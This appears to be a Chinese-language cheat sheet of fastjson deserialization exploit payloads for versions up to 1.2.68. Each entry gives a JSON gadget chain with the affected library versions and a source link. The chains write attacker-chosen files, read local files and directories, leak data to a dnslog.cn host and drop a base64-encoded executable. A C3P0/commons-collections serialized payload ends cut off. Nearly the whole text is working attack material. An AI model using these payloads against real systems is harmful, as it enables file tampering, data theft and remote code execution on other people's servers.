aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"1.txt",        "encoding":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }}

fastjson<=1.2.68,commons-io-2.7至2.8

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""testaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",        "start":0,        "end":2147483647      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"1.txt",        "charsetName":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }}

fastjson<=1.2.68,commons-io<=2.4,完整payload太长,见下文或者最后。

https://su18.org/post/fastjson-1.2.68/

{    "su18": {        "@type": "java.util.Currency",        "val": {            "currency": {                "writer": {                    "@type": "java.lang.AutoCloseable",                    "@type": "org.apache.commons.io.output.FileWriterWithEncoding",                    "file": "2.txt",                    "encoding": "UTF-8"                },                "outputStream": {                    "@type": "java.lang.AutoCloseable",                    "@type": "org.apache.commons.io.output.WriterOutputStream",                    "writeImmediately": true,                    "bufferSize": 4,                    "charsetName": "UTF-8",                    "writer": {                        "$ref": "$.currency.writer"                    }                },                "charInputStream": {                    "@type": "java.lang.AutoCloseable",                    "@type": "org.apache.commons.io.input.CharSequenceInputStream",                    "charset": "UTF-8",                    "bufferSize": 4,                    "s": {                        "@type": "java.lang.String"                        "test*****************"                    },                    "teeInputStream": {                        "@type": "java.lang.AutoCloseable",                        "@type": "org.apache.commons.io.input.TeeInputStream",                        "input": {                            "$ref": "$.currency.charInputStream"                        },                        "closeBranch": true,                        "branch": {                            "$ref": "$.currency.outputStream"                        }                    },                    "inputStream": {                        "@type": "java.lang.AutoCloseable",                        "@type": "org.apache.commons.io.input.BOMInputStream",                        "delegate": {                            "$ref": "$.currency.teeInputStream"                        },                        "boms": [{                            "charsetName": "UTF-8",                            "bytes": [0, 0, 0*****************]                        }]                    }                }            }        }    }

fastjson<=1.2.68,commons-io

自寻us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

{    "abc": {        "@type": "java.lang.AutoCloseable",        "@type": "org.apache.commons.io.input.BOMInputStream",        "delegate": {            "@type": "org.apache.commons.io.input.ReaderInputStream",            "reader": {                "@type": "jdk.nashorn.api.scripting.URLReader",                "url": "file:///D:/"            },            "charsetName": "UTF-8",            "bufferSize": 1024        },        "boms": [{            "charsetName": "UTF-8",            "bytes": [36]        },{            "charsetName": "UTF-8",            "bytes": [49]        }]    },    "address": {        "$ref": "$.abc.BOM"    }}

fastjson<=1.2.68,commons-io

https://b1ue.cn/archives/506.html

{      "abc":{"@type": "java.lang.AutoCloseable",        "@type": "org.apache.commons.io.input.BOMInputStream",        "delegate": {"@type": "org.apache.commons.io.input.ReaderInputStream",          "reader": { "@type": "jdk.nashorn.api.scripting.URLReader",            "url": "file:///tmp/test"          },          "charsetName": "UTF-8",          "bufferSize": 1024        },"boms": [          {            "@type": "org.apache.commons.io.ByteOrderMark",            "charsetName": "UTF-8",            "bytes": [98]          }        ]      },      "address" : {"@type": "java.lang.AutoCloseable","@type":"org.apache.commons.io.input.CharSequenceReader",                  "charSequence": {"@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"},"start": 0,"end": 0},      "xxx": {          "@type": "java.lang.AutoCloseable",          "@type": "org.apache.commons.io.input.BOMInputStream",          "delegate": {            "@type": "org.apache.commons.io.input.ReaderInputStream",            "reader": {              "@type": "jdk.nashorn.api.scripting.URLReader",              "url": "http://aaaxasd.g2pbiw.dnslog.cn/"              },            "charsetName": "UTF-8",            "bufferSize": 1024          },          "boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]      },      "zzz":{"$ref":"$.xxx.BOM[0]"}}

fastjson<=1.2.68,commons-io<=2.4,aspectjtools-1.9.6,commons-codec-1.6。完整payload太长,见下文或者最后。

http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/

{  "@type":"java.lang.AutoCloseable",  "@type":"org.apache.commons.io.input.BOMInputStream",  "delegate":{    "@type":"org.apache.commons.io.input.TeeInputStream",    "input":{      "@type": "org.apache.commons.codec.binary.Base64InputStream",      "in":{        "@type":"org.apache.commons.io.input.CharSequenceInputStream",        "charset":"utf-8",        "bufferSize": 1024,        "s":{"@type":"java.lang.String""TVqQAAMAAAAEAAAA*********************"      },      "doEncode":false,      "lineLength":1024,      "lineSeparator":"5ZWKCg==",      "decodingPolicy":0    },    "branch":{      "@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream",      "targetPath":"1.txt"    },    "closeBranch":true  },  "include":true,  "boms":[{                  "@type": "org.apache.commons.io.ByteOrderMark",                  "charsetName": "UTF-8",                  "bytes":[84, 86, 113, 81, 65, 65, 77, 65*********************]                }],  "x":{"$ref":"$.bOM"}}

fastjson<=1.2.24,C3P0,commons-collections-3.2.1

{    "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",     "userOverridesAsString": "HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D6572737400